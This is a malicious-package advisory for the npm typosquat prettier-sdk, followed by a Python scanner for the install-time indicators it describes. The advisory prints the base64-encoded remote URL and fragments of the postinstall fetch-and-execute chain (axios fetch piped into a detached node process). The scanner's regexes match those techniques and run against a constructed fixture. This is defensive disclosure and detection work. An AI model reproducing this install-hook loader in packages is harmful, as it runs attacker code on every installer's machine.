prettier-sdk @1.0.2
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-4645
Ecosystem
npm
Summary
Package name prettier-sdk impersonates the top-tier prettier package (~50M weekly downloads), copying its README verbatim and forging metadata (repository: prettier/prettier, homepage: https://prettier.io, author: James Long). The postinstall script node ./plugins/preinstall.js base64-decodes a hardcoded URL stored in a misleadingly named variable HASH_KEY = "aHR0cHM6Ly9qc29ua2VlcGVyLmNvbS9iLzM2S0VN" (decodes to https://jsonkeeper.com/b/36KEM, an anonymous mutable paste service), HTTP GETs it via axios, and pipes the response body's cookie field to the stdin of a detached node process via spawn('node', [], { detached: true, ... }) followed by child.stdin.write(s1); child.unref(). This executes arbitrary attacker-controlled JavaScript on every installer's machine at npm install time, with no integrity check, from a host the attacker can mutate at will. Three independent block signals stack: a typosquat carrying a malicious payload against a top-100 package, install-time fetch-and-execute from an anonymous paste host, and base64 obfuscation of the C2 URL.
Source: amazon-inspector (80a3bdd18c28c0c045aaed2a3e5725b3b38cb45bc9c16d0b795c4334caed17a5)
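The install-time chain in the summary gives three indicators a reviewer can check for in any unpacked npm package before it is installed. As an added example (not code from the OSV record, Amazon Inspector or the prettier project), this Python script audits a package directory for them: base64 literals that decode to URLs, a network fetch inside an install-lifecycle script, and a detached node child fed through stdin. The regexes, the indicator names, and the inert fixture (with its constructed https://paste.example.invalid/constructed URL) are assumptions, not taken from the real package.

```python
import base64
import json
import re
import tempfile
from pathlib import Path

LIFECYCLE = ("preinstall", "install", "postinstall")
B64_LITERAL = re.compile(r"[\"']([A-Za-z0-9+/]{16,}={0,2})[\"']")
FETCH_CALL = re.compile(r"\b(?:axios\.get|fetch|https?\.get)\(")
DETACHED_STDIN = re.compile(r"spawn\(\s*['\"]node['\"][\s\S]{0,200}?detached\s*:\s*true[\s\S]{0,300}?\.stdin\.write\(")

def _decode(literal: str) -> str:
    try:
        return base64.b64decode(literal, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return ""  # not valid base64, or not text: ignore

def decoded_urls(source: str) -> list[str]:
    """Return http(s) URLs hidden inside base64 string literals (the HASH_KEY trick)."""
    return [u for u in map(_decode, B64_LITERAL.findall(source)) if u.startswith(("http://", "https://"))]

def lifecycle_script_files(pkg_dir: Path) -> list[Path]:
    """Files run by install-lifecycle hooks, e.g. 'node ./plugins/preinstall.js'."""
    scripts = json.loads((pkg_dir / "package.json").read_text()).get("scripts", {})
    tokens = [t for hook in LIFECYCLE for t in str(scripts.get(hook, "")).split()]
    return [pkg_dir / t for t in tokens if t.endswith(".js") and (pkg_dir / t).is_file()]

def audit_package(pkg_dir: Path) -> dict[str, list[str]]:
    """Map each fired indicator to its evidence; an empty dict means nothing fired."""
    findings: dict[str, list[str]] = {}
    for path in lifecycle_script_files(pkg_dir):
        src = path.read_text()
        if urls := decoded_urls(src):
            findings.setdefault("base64_url", []).extend(urls)
        if FETCH_CALL.search(src):
            findings.setdefault("install_time_fetch", []).append(path.name)
        if DETACHED_STDIN.search(src):
            findings.setdefault("detached_node_stdin", []).append(path.name)
    return findings

def audit_constructed_sample() -> dict[str, list[str]]:
    """Audit an inert, constructed fixture with the reported layout (not the real package)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "plugins").mkdir()
        (root / "package.json").write_text(json.dumps({"scripts": {"postinstall": "node ./plugins/preinstall.js"}}))
        encoded = base64.b64encode(b"https://paste.example.invalid/constructed").decode()
        (root / "plugins" / "preinstall.js").write_text(  # constructed: nothing here is fetched or run
            f"const HASH_KEY = '{encoded}';\naxios.get(url); spawn('node', [], {{ detached: true }}); child.stdin.write(s1);\n")
        return audit_package(root)
```

Running audit_package against a real unpacked tarball (npm pack, then extract) flags all three signals for a package shaped like the one reported; a benign package with no install hooks returns an empty dict.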